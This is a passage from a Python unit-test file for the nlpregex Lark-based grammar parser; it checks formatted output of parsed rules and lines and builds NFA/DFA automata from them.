# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018d(self):
spec01 = '<nt01>:t02 [token01] (t03 [token02])+;'
spec_expected = 't02 [ token01 ] ( t03 [ token02 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018e(self):
spec01 = '<nt01>:t02 [token01] ((t03 [token02])+)[token03];'
spec_expected = 't02 [ token01 ] ( ( t03 [ token02 ] )+ ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0018f(self):
spec01 = '<nt01>:[token05](t02 [token01] ((t03 [token02])+)[token03])[token04];'
spec_expected = '[ token05 ] ( t02 [ token01 ] ( ( t03 [ token02 ] )+ ) [ token03 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019(self):
spec01 = '<nt01>:(t02 t03)+;'
spec_expected = '( t02 t03 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019b(self):
spec01 = '<nt01>:(t02 [token01] t03)+;'
spec_expected = '( t02 [ token01 ] t03 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019c(self):
spec01 = '<nt01>:(t02 t03 [token01])+;'
spec_expected = '( t02 t03 [ token01 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019d(self):
spec01 = '<nt01>:(t02 [token01] t03 [token02])+;'
spec_expected = '( t02 [ token01 ] t03 [ token02 ] )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
def test_0019e(self):
spec01 = '<nt01>:[token04]( (t02 [token01] t03 [token02])+)[token03] ;'
spec_expected = '[ token04 ] ( ( t02 [ token01 ] t03 [ token02 ] )+ ) [ token03 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
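# Every rule test above repeats the same parse -> format -> assert ->
# FST sequence. A helper along the lines of this hypothetical sketch
# could factor out that boilerplate; it uses only calls already
# exercised in this file and assumes the rule under test is named
# '<nt01>', as in all of the cases above.
def _check_rule(self, spec, expected, width=80, indent=4):
    parser = nlpregex.regular_language.lark_parser.LarkParser()
    ASTs = parser.parse_rules( spec )
    ast01 = ASTs['<nt01>']
    # round-trip the AST back to text and compare
    self.assertEqual( ast01.emit_formatted_text(width, indent, True), expected )
    # also exercise NFA generation and subset construction
    fst01 = ast01.generate_fst(True)
    return DFA_from_NFA(fst01)
# e.g. test_0004 would then reduce to:
#     self._check_rule('<nt01>:t02 t03;', 't02 t03')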
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
#
def test_rules_0001(self):
spec01 = '<nt01>:t02;'
spec_expected = 't02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL PLUS
#
def test_rules_0002(self):
spec01 = '<nt01>:t02+;'
spec_expected = 't02+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL STAR
#
def test_rules_0003(self):
spec01 = '<nt01>:t02*;'
spec_expected = 't02*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL QUESTION
#
def test_rules_0004(self):
spec01 = '<nt01>:t02?;'
spec_expected = 't02?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL finite_repeat
def test_rules_0005(self):
spec01 = '<nt01>:t02{3,7};'
spec_expected = 't02{ 3, 7 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
ast01.replace_finite_repeat_with_union()
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
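# Note: the {m,n} tests call replace_finite_repeat_with_union() before
# generate_fst(), presumably rewriting the finite-repeat node into
# union/optional form so FST generation does not have to handle {m,n}
# directly.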
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL out_token
def test_rules_0006(self):
spec01 = '<nt01>:t02 [token01];'
spec_expected = 't02 [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL
def test_rules_0007(self):
spec01 = '<nt01>:<nt02>;'
spec_expected = '<nt02>'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL PLUS
def test_rules_0008(self):
spec01 = '<nt01>:<nt02>+;'
spec_expected = '<nt02>+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL STAR
def test_rules_0009(self):
spec01 = '<nt01>:<nt02>*;'
spec_expected = '<nt02>*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL QUESTION
def test_rules_0010(self):
spec01 = '<nt01>:<nt02>?;'
spec_expected = '<nt02>?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL finite_repeat
def test_rules_0011(self):
spec01 = '<nt01>:<nt02>{6,11};'
spec_expected = '<nt02>{ 6, 11 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
ast01.replace_finite_repeat_with_union()
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> NONTERMINAL out_token
def test_rules_0012(self):
spec01 = '<nt01>:<nt02>[token01];'
spec_expected = '<nt02> [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0013(self):
spec01 = '<nt01>:( t01 t02 );'
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R PLUS
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0014(self):
spec01 = '<nt01>:( t01 t02 )+;'
spec_expected = '( t01 t02 )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R STAR
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0015(self):
spec01 = '<nt01>:( t01 t02 )*;'
spec_expected = '( t01 t02 )*'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R QUESTION
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0016(self):
spec01 = '<nt01>:( t01 t02 )?;'
spec_expected = '( t01 t02 )?'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R finite_repeat
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0017(self):
spec01 = '<nt01>:( t01 t02 ){3,6};'
spec_expected = '( t01 t02 ){ 3, 6 }'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
ast01.replace_finite_repeat_with_union()
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> PAREN_L expression PAREN_R out_token
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0018(self):
spec01 = '<nt01>:( t01 t02 )[token01];'
spec_expected = '( t01 t02 ) [ token01 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> out_token PAREN_L expression PAREN_R out_token
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0019(self):
spec01 = '<nt01>:[token01]( t01 t02 )[token02];'
spec_expected = '[ token01 ] ( t01 t02 ) [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_rules_0020(self):
spec01 = '<nt01>:t01 t02;'
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors PIPE expression
# factors -> factor
# factor -> TERMINAL
# factors -> factor
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_rules_0021(self):
spec01 = '<nt01>:t01 | t02;'
spec_expected = '( t01 | t02 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
fst01 = ast01.generate_fst(True)
# fst01.draw('nfa', show_out_token = True, view_now = True, out_format = "pdf" )
fst02 = DFA_from_NFA(fst01)
# fst02.draw('dfa', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> rules
# rules -> rule rules
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
# rules -> rule
# rule -> NONTERMINAL COLON expression SEMICOLON
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_rules_0022(self):
spec01 = '''
<nt01>:t03;
<nt03>:t04;
'''
spec_expected_01 = 't03'
spec_expected_02 = 't04'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ASTs = parser.parse_rules( spec01 )
ast01 = ASTs['<nt01>']
ast02 = ASTs['<nt03>']
str01 = ast01.emit_formatted_text(80, 4, True)
str02 = ast02.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected_01 )
self.assertEqual( str02, spec_expected_02 )
# ast01.draw('tmp1', True, 'pdf' )
# ast02.draw('tmp2', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp1', show_out_token = True, view_now = True, out_format = "pdf" )
# fst02 = ast02.generate_fst(True)
# fst02.draw('tmp2', show_out_token = True, view_now = True, out_format = "pdf" )
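# The test_lines_* cases below go through parser.parse_lines(), which
# takes raw newline-separated phrases instead of '<nt>: ... ;' rules;
# as test_lines_0003/0004 show, multiple lines are combined into a
# union of the per-line expressions.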
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0001(self):
spec01 = '''
t01
'''
spec_expected = 't01'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor factors
# factor -> TERMINAL
# factors -> factor
# factor -> TERMINAL
def test_lines_0002(self):
spec01 = '''
t01 t02
'''
spec_expected = 't01 t02'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0003(self):
spec01 = '''
t01
t02
t03
'''
spec_expected = '( t01 | t02 | t03 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
# start -> expression
# expression -> factors
# factors -> factor
# factor -> TERMINAL
def test_lines_0004(self):
spec01 = '''
t01 t02
t03 t04
t05 t06
'''
spec_expected = '( t01 t02 | t03 t04 | t05 t06 )'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0005(self):
spec01 = '''
t01 [token01] t02[token02]
'''
spec_expected = 't01 [ token01 ] t02 [ token02 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0006(self):
spec01 = '''
[token03]( t01 [token01] t02[token02] ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] t02 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0007(self):
spec01 = '''
[token03]( t01 [token01] | t02[token02] ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] | t02 [ token02 ] ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0008(self):
spec01 = '''
[token03]( t01 [token01] | t02* ) [token04]
'''
spec_expected = '[ token03 ] ( t01 [ token01 ] | t02* ) [ token04 ]'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0009(self):
spec01 = '''
( t01 | t02 | <nt02> )+
'''
spec_expected = '( t01 | t02 | <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# print (str01)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0010(self):
spec01 = '''
( t01 t02 <nt02> )+
'''
spec_expected = '( t01 t02 <nt02> )+'
parser = nlpregex.regular_language.lark_parser.LarkParser()
ast01 = parser.parse_lines( spec01 )
str01 = ast01.emit_formatted_text(80, 4, True)
# print (str01)
self.assertEqual( str01, spec_expected )
# ast01.draw('tmp', True, 'pdf' )
# fst01 = ast01.generate_fst(True)
# fst01.draw('tmp', show_out_token = True, view_now = True, out_format = "pdf" )
def test_lines_0011(self):
spec01 = '''
( T01 [ token03 token04 ] )
( N01 [ token03 token04 ] )
( [ token02 token01 ] ( T01 ) [ token03 token04 ] )
( T01 [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ) ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ) ( N02 [ token11 token12 ] ) ) [ token03 token04 ] )
( [ token02 token01 ] ( T01 [ token07 token08 ] ) [ token03 token04 ] )
( [ token02 token01 ] ( T02 [ token11 token12 ] ) [ token03 token04 ] )
( __EPS__ [ token03 token04 ] )
( [ token02 token01 ] ( T01 [ token07 token08 ] ) [ token03 token04 ] )
( [ token02 token01 ] ( T01{ 0, 3 } ) [ token03 token04 ] )
( [ token02 token01 ] ( T01{ 2, 7 } ) [ token03 token04 ] )
( [ token02 token01 ] ( ( T01 [ token07 token08 ] ){ 0, 3 } ) [ token03 token04 ] )
